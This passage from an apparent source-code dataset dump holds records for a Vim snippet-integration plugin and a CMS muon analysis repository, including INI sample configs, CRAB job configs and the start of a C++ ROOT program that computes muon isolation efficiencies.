BaseSource<Params> {\n async gatherCandidates(args: {\n denops: Denops;\n }): Promise<Candidate[]> {\n return args.denops.call(\n \"vsnip#get_complete_items\",\n await fn.bufnr(args.denops),\n ) as Promise<Candidate[]>;\n }\n\n params(): Params {\n return {};\n }\n}\n" }, { "alpha_fraction": 0.7348721027374268, "alphanum_fraction": 0.7423580884933472, "avg_line_length": 26.63793182373047, "blob_id": "056da56f5b50d7bb0e37a8cbca33e5c3b805691a", "content_id": "d098aaeb2e21b510e2af9b0b6ad75aa1c037e27d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1603, "license_type": "permissive", "max_line_length": 102, "num_lines": 58, "path": "/README.md", "repo_name": "gamoutatsumi/vim-vsnip-integ", "src_encoding": "UTF-8", "text": "# vim-vsnip-integ\n\nThis plugin provides some plugins integration.\n\n- Snippet completion\n- Snippet expansion\n\n\n# Requirements\n\n- [vim-vsnip](https://github.com/hrsh7th/vim-vsnip)\n\t- You should set [mapping](https://github.com/hrsh7th/vim-vsnip/blob/master/README.md#2-settingread).\n\n\n# Integrations\n\n### LSP\n\n#### [vim-lsp](https://github.com/prabirshrestha/vim-lsp)\n- Support snippet text expansion.\n\n#### [vim-lsc](https://github.com/natebosch/vim-lsc)\n- Support snippet text expansion.\n\n#### [vim-lamp](https://github.com/hrsh7th/vim-lamp)\n- Support snippet text expansion.\n\n#### [LanguageClient-neovim](https://github.com/autozimu/LanguageClient-neovim)\n- Support snippet text expansion.\n\n#### [nvim builtin-lsp omnifunc](https://github.com/neovim/neovim)\n- Support snippet text expansion.\n- Support textEdit/additionalTextEdits at CompleteDone.\n\n#### [deoplete-lsp x nvim builtin-lsp](https://github.com/Shougo/deoplete-lsp)\n- Support snippet text expansion.\n- Support 
textEdit/additionalTextEdits at CompleteDone.\n\n#### [completion-nvim x nvim builtin-lsp](https://github.com/haorenW1025/completion-nvim)\n- Support snippet text expansion.\n\n\n### Completion\n\n#### [deoplete.nvim](https://github.com/Shougo/deoplete.nvim)\n- Snippet completion.\n\n#### [asyncomplete.vim](https://github.com/prabirshrestha/asyncomplete.vim)\n- Snippet completion.\n\n#### [vim-mucomplete](https://github.com/lifepillar/vim-mucomplete)\n- Snippet completion.\n\n#### [completion-nvim](https://github.com/haorenW1025/completion-nvim)\n- Snippet completion.\n\n#### [ddc.vim](https://github.com/Shougo/ddc.vim)\n- Snippet completion.\n" } ]
3
brochero/MuonPOGtreeProducer
https://github.com/brochero/MuonPOGtreeProducer
2b8ca106e19638a963b794363c1cc636f6ca7612
58eb81eb6b8aba01058ce7ca64b0eb5670bd7a21
7a36bdbe9bbfa411b28f34ee00dab3a13c0a3076
refs/heads/Iso17
2020-04-06T04:09:32.860076
2018-11-02T12:24:37
2018-11-02T12:24:37
83,030,804
0
0
null
2017-02-24T10:34:52
2017-02-24T10:34:54
2017-10-18T15:27:30
C++
[ { "alpha_fraction": 0.6418604850769043, "alphanum_fraction": 0.7720929980278015, "avg_line_length": 19.428571701049805, "blob_id": "a0357f6275e2e5eea70f25df4bd33ab01c47e1b9", "content_id": "4a820fc699f7c28383785c3661a4a79e547d7a51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 430, "license_type": "no_license", "max_line_length": 142, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT1000toInf.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-1000toInf_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 1.621 \n;(10.4305*0.15544);\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6348837018013, "alphanum_fraction": 0.7767441868782043, "avg_line_length": 19.428571701049805, "blob_id": "25f1505081689e247c785ffd5c425562680ac4e7", "content_id": "7594a1406e55e06310ee277ae8bb16f5bd488794", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 430, "license_type": "no_license", "max_line_length": 139, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT15to20.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-15to20_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 3819570. 
\n;(1273190000*0.003)\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6348837018013, "alphanum_fraction": 0.7744185924530029, "avg_line_length": 19.428571701049805, "blob_id": "bc0da829b036b7c82bef9851c1ff586fe96433fd", "content_id": "8037090faaf7a854a679c13949549878c468b7ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 430, "license_type": "no_license", "max_line_length": 141, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT170to300.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-170to300_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 8654.49\n;(117989*0.07335); \nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.7762237787246704, "avg_line_length": 19.380952835083008, "blob_id": "015d8b1806a1d54cc7dd3247e4372fb75c5d5082", "content_id": "bd434a90ead82c8f7a81b6c66d56a0251ce19c39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 429, "license_type": "no_license", "max_line_length": 140, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT80to120.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-80to120_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 106034.\n;(2758420*0.03844);\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6334106922149658, "alphanum_fraction": 0.7772621512413025, "avg_line_length": 19.4761905670166, "blob_id": "a969f00dd8ea04245fdabcd68fd20e76f7a22e8e", "content_id": "d6d520f24f00df22e518ace76d785fe19c5efbc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 431, "license_type": "no_license", "max_line_length": 139, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT30to50.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-30to50_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 1652470.\t\n;(139803000*0.01182)\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6348837018013, "alphanum_fraction": 0.7720929980278015, "avg_line_length": 19.428571701049805, "blob_id": "935c473a7b0d1a12960207546b5c2dfefbb42234", "content_id": "6d929e0165ffe06e9b358e5d85aa36537ee5eeb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 430, "license_type": "no_license", "max_line_length": 142, "num_lines": 21, "path": 
"/Tools/efficiencies/config/configQCD_pT800to1000.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-800to1000_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 4.707\n;(32.3486*0.14552);\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6444300413131714, "alphanum_fraction": 0.6949481964111328, "avg_line_length": 44.382354736328125, "blob_id": "45db66a9cde609a20ed04f85e353afa3660c0b2e", "content_id": "7cda1bd26e85b9509bb748db5c11064794bb3a1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1544, "license_type": "no_license", "max_line_length": 156, "num_lines": 34, "path": "/Tools/test/crab/crabIsoDY_cfg.py", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "from WMCore.Configuration import Configuration\nconfig = Configuration()\n\nconfig.section_('General')\nconfig.General.transferLogs = True\nconfig.General.requestName = 'DYJetsToLL_madgraphMLMRunIIFall18-102X_upgrade2018'\n#config.General.requestName = 'DYJetsToLL_madgraphMLMRunIIFall18-102X_upgrade2018FlatPU0to70'\n\nconfig.section_('JobType')\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = '../muonPogNtuples_miniAOD_cfg.py'\nconfig.JobType.pyCfgParams = ['globalTag=102X_upgrade2018_realistic_v10',\n 'ntupleName=muonPOGNtuple_IsolationStudies18_DY.root',\n 'nEvents=-1',\n 'runOnMC=True',\n 'hltPathFilter=all',\n 'minMuPt=5.0',\n 'minNMu=1'\n ]\nconfig.JobType.allowUndistributedCMSSW = True # To fix cmssw releases\n\nconfig.section_('Data')\nconfig.Data.inputDataset = '/DYJetsToLL_M-50_TuneCP5_13TeV-madgraphMLM-pythia8/RunIIFall18MiniAOD-102X_upgrade2018_realistic_v12_ext1-v1/MINIAODSIM'\n#config.Data.inputDataset = '/DYJetsToLL_M-50_TuneCP5_13TeV-madgraphMLM-pythia8/RunIIFall18MiniAOD-FlatPU0to70_102X_upgrade2018_realistic_v12-v1/MINIAODSIM'\n\n\nconfig.Data.splitting = 'FileBased'\nconfig.Data.unitsPerJob = 1\nconfig.Data.inputDBS = 'https://cmsweb.cern.ch/dbs/prod/global/DBSReader/'\n# config.Data.ignoreLocality = True\nconfig.Data.allowNonValidInputDataset = True\n\nconfig.section_('Site')\nconfig.Site.storageSite = 'T2_CH_CERN'\n\n" }, { "alpha_fraction": 0.6286126971244812, "alphanum_fraction": 0.6654624342918396, "avg_line_length": 40.93939208984375, "blob_id": "bc9594b4e938dcd2c80d90cb6cd987f82eb8432e", "content_id": "9056eed7fc283b8367e09a4c2f537131144e9f35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1384, "license_type": "no_license", "max_line_length": 147, "num_lines": 33, "path": "/Tools/test/crab/crabIsoQCD_cfg.py", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "from WMCore.Configuration import Configuration\nconfig = Configuration()\n\nconfig.section_('General')\nconfig.General.transferLogs = True\nconfig.General.requestName = 'QCD_RunIISpring18MiniAOD-100X_upgrade2018_realistic_v10-v1_OnlyTree'\n\nconfig.section_('JobType')\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = '../muonPogNtuples_miniAOD_cfg.py'\nconfig.JobType.pyCfgParams = ['globalTag=100X_upgrade2018_realistic_v10',\n 
'ntupleName=muonPOGNtuple_IsolationStudies18_DY.root',\n 'nEvents=-1',\n 'runOnMC=True',\n 'hltPathFilter=all',\n 'minMuPt=5.0',\n 'minNMu=1'\n ]\nconfig.JobType.allowUndistributedCMSSW = True # To fix cmssw releases\n\nconfig.section_('Data')\nconfig.Data.inputDataset = '/QCD_Pt-20toInf_MuEnrichedPt15_TuneCP5_13TeV_pythia8/RunIISpring18MiniAOD-100X_upgrade2018_realistic_v10-v1/MINIAODSIM'\n\nconfig.Data.splitting = 'FileBased'\nconfig.Data.unitsPerJob = 1\nconfig.Data.inputDBS = 'https://cmsweb.cern.ch/dbs/prod/global/DBSReader/'\n# config.Data.ignoreLocality = True\nconfig.Data.allowNonValidInputDataset = True\n\nconfig.section_('Site')\nconfig.Site.storageSite = 'T2_CH_CERN'\n#config.Site.blacklist = ['T2_US_*']\n#config.Site.whitelist = ['T2_IT_Bari']\n" }, { "alpha_fraction": 0.594989001750946, "alphanum_fraction": 0.6118699908256531, "avg_line_length": 41.31296920776367, "blob_id": "bf8536be86b2ab7d04d3803b77ad5dcaef1b5519", "content_id": "840322a58a8004c6a17a03cbd56fdffd4c210852", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 45021, "license_type": "no_license", "max_line_length": 233, "num_lines": 1064, "path": "/Tools/efficiencies/ISOEfficiency.C", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "#include \"TROOT.h\"\n#include \"TRint.h\"\n#include \"TStyle.h\"\n#include \"TFile.h\"\n#include \"TCanvas.h\"\n#include \"TLine.h\"\n#include \"TH1.h\"\n#include \"TH2.h\"\n#include \"TH1D.h\"\n#include \"TH2D.h\"\n#include \"TProfile.h\"\n#include \"TEfficiency.h\"\n#include \"TGraphAsymmErrors.h\"\n#include \"THStack.h\"\n#include \"TLegend.h\"\n#include \"TRegexp.h\"\n#include \"TTree.h\"\n#include \"TBranch.h\"\n#include \"TLorentzVector.h\"\n\n#include \"../src/MuonPogTree.h\"\n#include \"../src/Utils.h\"\n#include \"tdrstyle.C\"\n\n#include <cstdlib>\n#include <iostream>\n#include <algorithm>\n#include <sstream>\n#include <iostream>\n#include <fstream> \n#include <vector>\n#include <regex>\n#include <map>\n\n#include <boost/filesystem.hpp>\n#include <boost/property_tree/ptree.hpp>\n#include <boost/property_tree/ini_parser.hpp>\n#include <boost/property_tree/exceptions.hpp>\n#include <boost/lexical_cast.hpp>\n\n#include <TError.h>\n\n// Helper classes defintion *****\n// 1. SampleConfig : configuration class containing sample information\n// 2. TagAndProbeConfig : configuration class containing TnP cuts information\n// 3. 
Plotter : class containing the plot definition and defining the plot filling \n// for a given sample <= CB modify this to add new variables\n// ******************************\nstd::vector<TString> GetListOfFiles(TString FileName);\n\nnamespace muon_pog {\n \n class SampleConfig {\n\n public :\n\n // config parameters (public for direct access)\n\n TString fileName; \n TString sampleName; \n Float_t QCDWeight;\n Float_t nEvents;\n Bool_t applyReweighting;\n std::vector<int> runs;\n \n SampleConfig() {};\n \n#ifndef __MAKECINT__ // CB CINT doesn't like boost :'-( \n SampleConfig(boost::property_tree::ptree::value_type & vt); \n#endif\n\n ~SampleConfig() {};\n\n private:\n std::vector<int> toArray(const std::string & entries); \n \n };\n\n class TagAndProbeConfig {\n\n public :\n \n // config parameters (public for direct access)\n \n Float_t gen_DrCut;\n \n Float_t probe_minPt;\n Float_t iso_DeltaBeta; \n Float_t iso_LooseWP, iso_TightWP;\n Float_t isoPUPPI_LooseWP, isoPUPPI_TightWP, isoPUPPILep_LooseWP, isoPUPPILep_TightWP, isoPUPPINoLep_LooseWP, isoPUPPINoLep_TightWP;\n Float_t Miniiso_LooseWP, Miniiso_TightWP; \n Float_t IDMedium_CutdXY, IDMedium_CutdZ;\n \n TagAndProbeConfig() {};\n \n#ifndef __MAKECINT__ // CB CINT doesn't like boost :'-( \n TagAndProbeConfig(boost::property_tree::ptree::value_type & vt); \n#endif\n\n ~TagAndProbeConfig() {};\n \n private:\n std::vector<TString> toArray(const std::string & entries); \n \n };\n\n\n class Plotter {\n\n public :\n \n std::vector<TString> IDName = {\"GLB\", \"TRK\", \"LOOSE\", \"MEDIUM\", \"TIGHT\", \"SOFT\", \"HIGHpT\", \"MEDIUMPrompt\",\n\t\t\t\t \"MVALOOSE\", \"MVAMEDIUM\", \"MVATIGHT\"};\n enum BinType {GLB=0, TRK, LOOSE, MEDIUM, TIGHT, SOFT, HIGHpT, MEDIUMPrompt,\n\t\t MVALOOSE, MVAMEDIUM, MVATIGHT};\n\n std::vector<TString> region = {\"Full\", \"Barrel\", \"Endcap\", \"Overlap\"};\n enum BinRegion {Full=0, Barrel, Endcap, Overlap};\n \n std::vector<TString> IsoName = {\"ISOPF\",\"ISOPUPPI\",\"ISOPUPPILep\",\"ISOPUPPINoLep\",\"MiniISO\"};\n enum BinIsoName {ISOPF=0,ISOPUPPI,ISOPUPPILep,ISOPUPPINoLep,MiniISO};\n \n std::vector< std::vector<TString> > isowp = {{\"ISONoCut\", \"ISOLoose\", \"ISOTight\"},\n\t\t\t\t\t\t {\"PUPPILoose\",\"PUPPITight\"},\n\t\t\t\t\t\t {\"PUPPILepLoose\",\"PUPPILepTight\"},\n\t\t\t\t\t\t {\"PUPPINoLepLoose\",\"PUPPINoLepTight\"},\n\t\t\t\t\t\t {\"MiniISOLoose\",\"MiniISOTight\"}};\n \n std::vector<TString> PUr = {\"FullPU\", \"LowPU\", \"MediumPU\", \"HighPU\"}; \n enum BinPUr{FullPU=0, LowPU, MediumPU, HighPU};\n\n std::vector<TString> pTr = {\"FullpT\", \"LowpT\", \"MediumpT\", \"HighpT\"}; \n enum BinpTr{FullpT=0, LowpT, MediumpT, HighpT};\n \n \n Plotter(muon_pog::TagAndProbeConfig tnpConfig, muon_pog::SampleConfig & sampleConfig) :\n m_tnpConfig(tnpConfig) , m_sampleConfig(sampleConfig) {};\n ~Plotter() {};\n \n void book(TFile *outFile);\n void fill(const std::vector<muon_pog::Muon> & muons, const muon_pog::HLT & hlt, const muon_pog::Event & ev, float weight);\n void fillGen(const std::vector<muon_pog::GenParticle> & genpars, const muon_pog::Event & ev);\n\n std::map<TString, TH1D *> m_plots;\n std::map<TString, TH2D *> m_2Dplots;\n std::map<TString, TProfile *> m_prof;\n std::map<TString, TEfficiency *> m_effs;\n\n std::map<TString, TH2D *> m_2Dyields;\n\n TagAndProbeConfig m_tnpConfig;\n SampleConfig m_sampleConfig;\n \n };\n \n}\n\n// Helper classes defintion *****\n// 1. parseConfig : parse the full cfg file\n// 1. 
comparisonPlot : make a plot overlayng data and MC for a given plot\n// ******************************\n\nnamespace muon_pog {\n void parseConfig(const std::string configFile, TagAndProbeConfig & tpConfig,\n\t\t std::vector<SampleConfig> & sampleConfigs);\n \n void comparisonPlots(std::vector<Plotter> & plotters,\n\t\t TFile *outFile, TString & outputDir);\n\n void print_progress(int TreeEntries, Long64_t ievt);\n void copyPhp(const TString & outputDir);\n Bool_t IsMediumHIP(const muon_pog::Muon & muon);\n Bool_t IsSoftHIP (const muon_pog::Muon & muon);\n // void setTProfY(TProfile &prof1, TProfile &prof2);\n}\n\n\n\n// The main program******** *****\n// 1. Get configuration file and produces configurations\n// 2. Create Plotters and loop on the event to fill them\n// 3. Writes results in cnfigurable outuput file\n// ******************************\n\nint main(int argc, char* argv[]){\n using namespace muon_pog;\n\n gErrorIgnoreLevel=kError;\n\n\n if (argc != 4) \n {\n std::cout << \"Usage : \"\n\t\t<< argv[0] << \" PATH_TO_CONFIG_FILE PATH_TO_OUTPUT_DIR OUTPUT_FILE_NAME\\n\";\n exit(100);\n }\n\n std::string configFile(argv[1]);\n \n std::cout << \"[\" << argv[0] << \"] Using config file \" << configFile << std::endl;\n\n // Output directory\n TString dirName = argv[2];\n TString outputName = argv[3];\n system(\"mkdir -p \" + dirName);\n TFile* outputFile = TFile::Open(dirName + \"/histos_\" + outputName + \".root\",\"RECREATE\"); // CB find a better name for output file \n\n // Set it to kTRUE if you do not run interactively\n gROOT->SetBatch(kTRUE); \n\n // Initialize Root application\n TRint* app = new TRint(\"CMS Root Application\", &argc, argv);\n\n setTDRStyle();\n \n TagAndProbeConfig tnpConfig;\n std::vector<SampleConfig> sampleConfigs;\n \n parseConfig(configFile,tnpConfig,sampleConfigs);\n\n std::vector<Plotter> plotters;\n\n for (auto sampleConfig : sampleConfigs)\n {\n\n Plotter plotter(tnpConfig, sampleConfig);\n plotter.book(outputFile);\n \n plotters.push_back(plotter);\n }\n \n for (auto plotter : plotters)\n {\n\n\n TString fileListName = plotter.m_sampleConfig.fileName;\n std::cout << \"[\" << argv[0] << \"] Processing file \"\n\t\t<< fileListName.Data() << std::endl; \n\n std::vector<TString> SetOfFiles = GetListOfFiles(fileListName);\n \n std::cout << \"Number of files to be processed: \" << SetOfFiles.size() << std::endl;\n \n // Initialize pointers to summary and full event structure\n muon_pog::Event* ev = new muon_pog::Event();\n\n // Loop over all files\n for(unsigned int ifile = 0; ifile < SetOfFiles.size(); ifile++){\n\t\n\tTFile* inputFile; \n\tTTree* tree;\n\tTBranch* evBranch;\n\t\n\t// Open file, get tree, set branches\n\tinputFile = TFile::Open(SetOfFiles.at(ifile),\"READONLY\");\n\ttree = (TTree*)inputFile->Get(\"MUONPOGTREE\");\n\tif (!tree) inputFile->GetObject(\"MuonPogTree/MUONPOGTREE\",tree);\n\t\n\tevBranch = tree->GetBranch(\"event\");\n\tevBranch->SetAddress(&ev);\n\t\n\t// Watch number of entries\n\tint nEntries;\n\tif (plotter.m_sampleConfig.nEvents > 0 && \n\t plotter.m_sampleConfig.nEvents < tree->GetEntriesFast()) nEntries = plotter.m_sampleConfig.nEvents;\n\telse nEntries = tree->GetEntriesFast();\n\t\n\tstd::cout << \"[\" << argv[0] << \"] Number of entries/sample = \" << nEntries << std::endl;\n\t\n\tint nFilteredEvents = 0;\n\t\n\tfloat weight = 1.;\n\t// Add cross section weight -> To take into account QCD filter efficiencies\n\tif(plotter.m_sampleConfig.applyReweighting==true)\n\t weight *= (plotter.m_sampleConfig.QCDWeight/nEntries);\n 
\n\tstd::cout << \"Weight per event = \" << weight << std::endl;\t\n\t\n\tfor (Long64_t iEvent=0; iEvent<nEntries; ++iEvent) {\n\t if (tree->LoadTree(iEvent)<0) break;\n\t\n\t print_progress(nEntries, iEvent);\n\t \n\t evBranch->GetEntry(iEvent);\n\n\t plotter.fill(ev->muons, ev->hlt, (*ev), weight);\n\t\n\t plotter.fillGen(ev->genParticles, (*ev));\n\t}\n \n\tstd::cout << \"[==================================================] 100% \" << std::endl;\n\t\n\tdelete tree;\n\tinputFile->Close();\n\tdelete inputFile;\n } // for(ifiles)\n \n delete ev;\n std::cout << std::endl;\n \n }\n \n muon_pog::comparisonPlots(plotters,outputFile,dirName);\n muon_pog::copyPhp(dirName);\n \n outputFile->Write();\n \n if (!gROOT->IsBatch()) app->Run();\n\n return 0;\n\n}\n\n\nmuon_pog::TagAndProbeConfig::TagAndProbeConfig(boost::property_tree::ptree::value_type & vt)\n{\n\n try\n {\n\n gen_DrCut = vt.second.get<Float_t>(\"gen_DrCut\");\n \n iso_DeltaBeta = vt.second.get<Float_t>(\"iso_DeltaBeta\");\n\n iso_LooseWP = vt.second.get<Float_t>(\"iso_LooseWP\");\n iso_TightWP = vt.second.get<Float_t>(\"iso_TightWP\");\n isoPUPPI_LooseWP = vt.second.get<Float_t>(\"isoPUPPI_LooseWP\");\n isoPUPPI_TightWP = vt.second.get<Float_t>(\"isoPUPPI_TightWP\");\n isoPUPPILep_LooseWP = vt.second.get<Float_t>(\"isoPUPPILep_LooseWP\");\n isoPUPPILep_TightWP = vt.second.get<Float_t>(\"isoPUPPILep_TightWP\");\n isoPUPPINoLep_LooseWP = vt.second.get<Float_t>(\"isoPUPPINoLep_LooseWP\");\n isoPUPPINoLep_TightWP = vt.second.get<Float_t>(\"isoPUPPINoLep_TightWP\");\n Miniiso_LooseWP = vt.second.get<Float_t>(\"Miniiso_LooseWP\");\n Miniiso_TightWP = vt.second.get<Float_t>(\"Miniiso_TightWP\");\n\n IDMedium_CutdXY = vt.second.get<Float_t>(\"IDMedium_CutdXY\");\n IDMedium_CutdZ = vt.second.get<Float_t>(\"IDMedium_CutdZ\");\n\n probe_minPt = vt.second.get<Float_t>(\"probe_minPt\");\n\n }\n\n catch (boost::property_tree::ptree_bad_data bd)\n {\n std::cout << \"[TagAndProbeConfig] Can't get data : has error : \"\n\t\t<< bd.what() << std::endl;\n throw std::runtime_error(\"Bad INI variables\");\n }\n\n}\n\nmuon_pog::SampleConfig::SampleConfig(boost::property_tree::ptree::value_type & vt)\n{\n \n try\n {\n fileName = TString(vt.second.get<std::string>(\"fileName\").c_str());\n sampleName = TString(vt.first.c_str());\n QCDWeight = vt.second.get<Float_t>(\"QCDWeight\");\n nEvents = vt.second.get<Float_t>(\"nEvents\"); //CB do we really need this? 
can't we take nEvents from the file itself?\n applyReweighting = vt.second.get<Bool_t>(\"applyReweighting\");\n runs = toArray(vt.second.get<std::string>(\"runs\"));\n }\n \n catch (boost::property_tree::ptree_bad_data bd)\n {\n std::cout << \"[TagAndProbeConfig] Can't get data : has error : \"\n\t\t<< bd.what() << std::endl;\n throw std::runtime_error(\"Bad INI variables\");\n }\n \n}\n\nstd::vector<int> muon_pog::SampleConfig::toArray(const std::string& entries)\n{\n \n std::vector<int> result;\n std::stringstream sentries(entries);\n std::string item;\n while(std::getline(sentries, item, ','))\n result.push_back(atoi(item.c_str()));\n return result;\n\n}\n\n\nstd::vector<TString> muon_pog::TagAndProbeConfig::toArray(const std::string& entries)\n{\n \n std::vector<TString> result;\n std::stringstream sentries(entries);\n std::string item;\n while(std::getline(sentries, item, ','))\n result.push_back(TString(item));\n return result;\n\n}\n\n\nvoid muon_pog::Plotter::book(TFile *outFile)\n{\n\t \n TString sampleTag = m_sampleConfig.sampleName;\n \n outFile->cd(\"/\");\n outFile->mkdir(sampleTag);\n outFile->cd(sampleTag);\n \n outFile->mkdir(sampleTag + \"/Yields\");\n \n TH1::SetDefaultSumw2(kTRUE);\n \n // -- Yields\n outFile->cd(sampleTag + \"/Yields/\");\n m_2Dyields[\"RecoMuon\"] = new TH2D(\"Yields_RecoMuon\" ,\"Yields \" + sampleTag + \" RecoMuons \",IDName.size()+3,0,IDName.size()+3, region.size(),0,region.size());\n m_2Dyields[\"RecoMuon\"]->SetOption(\"COLTEXT\"); \n for (unsigned int nid=0; nid<IDName.size(); nid++) m_2Dyields[\"RecoMuon\"]->GetXaxis()->SetBinLabel(nid+1,IDName[nid]);\n m_2Dyields[\"RecoMuon\"]->GetXaxis()->SetBinLabel(IDName.size()+1, \"Total Pass Cut\");\n m_2Dyields[\"RecoMuon\"]->GetXaxis()->SetBinLabel(IDName.size()+2, \"Total\");\n m_2Dyields[\"RecoMuon\"]->GetXaxis()->SetBinLabel(IDName.size()+3, \"Total Events (weighted)\");\n for (unsigned int nre=0; nre<region.size(); nre++) m_2Dyields[\"RecoMuon\"]->GetYaxis()->SetBinLabel(nre+1,region[nre]);\n \n m_2Dyields[\"GenMuon\"] = new TH2D(\"Yields_GenMuon\" ,\"Yields GenMuons \" + sampleTag,4,0,4,region.size(),0,region.size());\n m_2Dyields[\"GenMuon\"]->SetOption(\"COLTEXT\"); \n m_2Dyields[\"GenMuon\"]->GetXaxis()->SetBinLabel(1, \"Total Events\");\n m_2Dyields[\"GenMuon\"]->GetXaxis()->SetBinLabel(2, \"Gen Muon Z\");\n m_2Dyields[\"GenMuon\"]->GetXaxis()->SetBinLabel(3, \"Gen Muon Others\");\n m_2Dyields[\"GenMuon\"]->GetXaxis()->SetBinLabel(4, \"Gen Muon Total\");\n for (unsigned int nre=0; nre<region.size(); nre++) m_2Dyields[\"GenMuon\"]->GetYaxis()->SetBinLabel(nre+1,region[nre]);\n\n m_plots[\"NumberOfGenMuonsFromZ\"] = new TH1D (\"NMuons_GenFromZ\", \" Number of GEN Muons from Z per Evt ; N. Muons; # entries\", 4, 0., 4.);\n m_plots[\"NumberOfGenMuonsOther\"] = new TH1D (\"NMuons_GenOther\", \" Number of GEN Muons (NOT from Z) per Evt ; N. Muons; # entries\", 4, 0., 4.);\n\n m_plots[\"NMuons\"] = new TH1D (\"NMuons\", \" Number of Muons per Evt ; N. 
